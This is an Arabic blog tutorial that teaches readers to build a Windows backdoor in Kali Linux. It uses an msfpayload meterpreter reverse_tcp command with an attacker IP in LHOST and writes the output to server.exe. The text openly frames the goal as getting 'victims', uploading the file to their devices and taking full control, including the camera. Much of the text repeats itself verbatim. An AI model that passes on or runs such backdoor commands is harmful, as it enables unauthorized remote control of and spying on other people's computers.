لقد تحدثنا في دروس سابقة عن كيفية تنصيب الكالي لينكس على الاجهزة المكتبية و اللوحية و ايضا الهواتف و يمكنكم مراجعة قسم اللينكس في المدونة من خلال هذا الرابط هنا .
الباك دور (backdoor) هو ملف صغير يتم صنعه من خلال المبرمج او الهكر ليتمكن من التحكم في موقع أو جهاز من بعد ، و بكل بساطة ال (backdoor) خادم مثل العامل في المقهى فهو يقوم بخدمتنا من خلال جلب معلومات نحددها نحن ، ابقو معنا لتتعرفو على أهميته و كيفية صنعه من خلال نضام التشغيل كالي لينكس ، و كيفية استغلال الباك دور للتحصل على ضحايا و التحكم فيها .
الان و بعد ان تعرفنا على المعنى الخاص بكلمة باك دور ووضيفته سنقوم بالتعرف عليه اكثر من خلال هذا المثال الصغير و التوضيحي :
للكالي لينكس ادواة كثيرة و قوية و من ابرزها الميتاسبلوت و الارمتاج و يمكننا اختراق الاجهزة من خلال اداة الارمتاج ، أما في مايخص اداة الميتاسبلوت فأغراضها متعددة .
يمكن اختراق جهاز من خلال الارمتاج و لاكن لايمكننا التحكم فيه ، لان الاختراق يمر بمرحلتين ، المرحلة الاولى و هي التمكن من التعرف على جهاز الضحية و معلوماته و المرحلة الثانية التحكم في الجهاز ، عند اختراقك لجهاز من خلال اداة الارمتاج ستتمكن من رفع الملفات على جهاز الضحية فقط ، يعنى لايمكنك التحكم في الجهاز لاكن يمكنك رفع ملفات عليه ، الى الان اضن كلامى مفهوم وبسيط .
الان لدينا مشكلة صغيرة و هى اننا اخترقنا جهاز و لاكننا لم نتمكن من التحكم فيه ، لاننا وجدنا خيار وحيد يمكن القيام به و هو رفع ملف على هذا الجهاز ، انت تضن ان هذا الخيار تافه و لاجدوى منه لاكنه مهم بالنسبة للهكر ، لان الباك دور الذى تحدثنا عليه في البداية هو الحل الوحيد لهذا المشكل فمن خلاله يمكننا جلب معلومات اكثر و التحكم في الضحية اكثر ، نقوم برفع هذا الباك دور على جهاز الضحية لنتمكن من التحكم الكلي و التام فيها مثل فتح الكميرا و غيره ....
كيف نقوم بصنع باك دور ؟
هذا الامر سهل للغاية ، اولا عليك فتح التارمنا أو نافذه الاوامر في الكالي لينكس ، نقوم بكتابة هذا الامر msfpayload windows/meterpreter/reverse_tcp
msfpayload هو لعمل الباك دور
windows/meterpreter/reverse_tcp وهو امر (لعمل الاتصالات العكسية مع الضحية وفتح الملفات )
الان نكتب LHOST امر استخدام الاي بي نكتب بجانبه أي بي جهازنا ليصبح الامر أي بي جهازك Msfpayload windows/meterpreter/reverse_tcp LHOST=
طريقة جلب الاي بي سهلة للغاية و لا داعى لشرحها الان سيصبح الامر هكذا :
Msfpayload windows/meterpreter/reverse_tcp LHOST=77.31.9.49
الباك دور (backdoor) هو ملف صغير يتم صنعه من خلال المبرمج او الهكر ليتمكن من التحكم في موقع أو جهاز من بعد ، و بكل بساطة ال (backdoor) خادم مثل العامل في المقهى فهو يقوم بخدمتنا من خلال جلب معلومات نحددها نحن ، ابقو معنا لتتعرفو على أهميته و كيفية صنعه من خلال نضام التشغيل كالي لينكس ، و كيفية استغلال الباك دور للتحصل على ضحايا و التحكم فيها .
الان و بعد ان تعرفنا على المعنى الخاص بكلمة باك دور ووضيفته سنقوم بالتعرف عليه اكثر من خلال هذا المثال الصغير و التوضيحي :
للكالي لينكس ادواة كثيرة و قوية و من ابرزها الميتاسبلوت و الارمتاج و يمكننا اختراق الاجهزة من خلال اداة الارمتاج ، أما في مايخص اداة الميتاسبلوت فأغراضها متعددة .
يمكن اختراق جهاز من خلال الارمتاج و لاكن لايمكننا التحكم فيه ، لان الاختراق يمر بمرحلتين ، المرحلة الاولى و هي التمكن من التعرف على جهاز الضحية و معلوماته و المرحلة الثانية التحكم في الجهاز ، عند اختراقك لجهاز من خلال اداة الارمتاج ستتمكن من رفع الملفات على جهاز الضحية فقط ، يعنى لايمكنك التحكم في الجهاز لاكن يمكنك رفع ملفات عليه ، الى الان اضن كلامى مفهوم وبسيط .
الان لدينا مشكلة صغيرة و هى اننا اخترقنا جهاز و لاكننا لم نتمكن من التحكم فيه ، لاننا وجدنا خيار وحيد يمكن القيام به و هو رفع ملف على هذا الجهاز ، انت تضن ان هذا الخيار تافه و لاجدوى منه لاكنه مهم بالنسبة للهكر ، لان الباك دور الذى تحدثنا عليه في البداية هو الحل الوحيد لهذا المشكل فمن خلاله يمكننا جلب معلومات اكثر و التحكم في الضحية اكثر ، نقوم برفع هذا الباك دور على جهاز الضحية لنتمكن من التحكم الكلي و التام فيها مثل فتح الكميرا و غيره ....
كيف نقوم بصنع باك دور ؟
هذا الامر سهل للغاية ، اولا عليك فتح التارمنا أو نافذه الاوامر في الكالي لينكس ، نقوم بكتابة هذا الامر msfpayload windows/meterpreter/reverse_tcp
msfpayload هو لعمل الباك دور
windows/meterpreter/reverse_tcp وهو امر (لعمل الاتصالات العكسية مع الضحية وفتح الملفات )
الان نكتب LHOST امر استخدام الاي بي نكتب بجانبه أي بي جهازنا ليصبح الامر أي بي جهازك Msfpayload windows/meterpreter/reverse_tcp LHOST=
طريقة جلب الاي بي سهلة للغاية و لا داعى لشرحها الان سيصبح الامر هكذا :
Msfpayload windows/meterpreter/reverse_tcp LHOST=77.31.9.49
نقوم ب اضافة هذا x>server.exe
الان يصبح الامر هكذا :
Msfpayload windows/meterpreter/reverse_tcp LHOST=77.31.9.49 x>server.exe
هذا كل شىء لصنع باك دور ، الان تبقت عملية ارساله للضحية و طبعا بعد انتهاء عملية رفع هذا الباك دور على جهاز الضحية ستتمكن من الضغط على كل خيارات التحكم و جميع الاوامر ستصبح ممكنة عندك ، هذا لا ينطوي فقط على الاجهزة فهناك هكر محترفين يستغلون الامر في اختراق المواقع و غيره ، اتمنى ان يكون هذا الدرس قد اعجبكم لا تتردو في طرح اي استفسار ، استودعكم الى ملتقانى في تدوينة قادمة .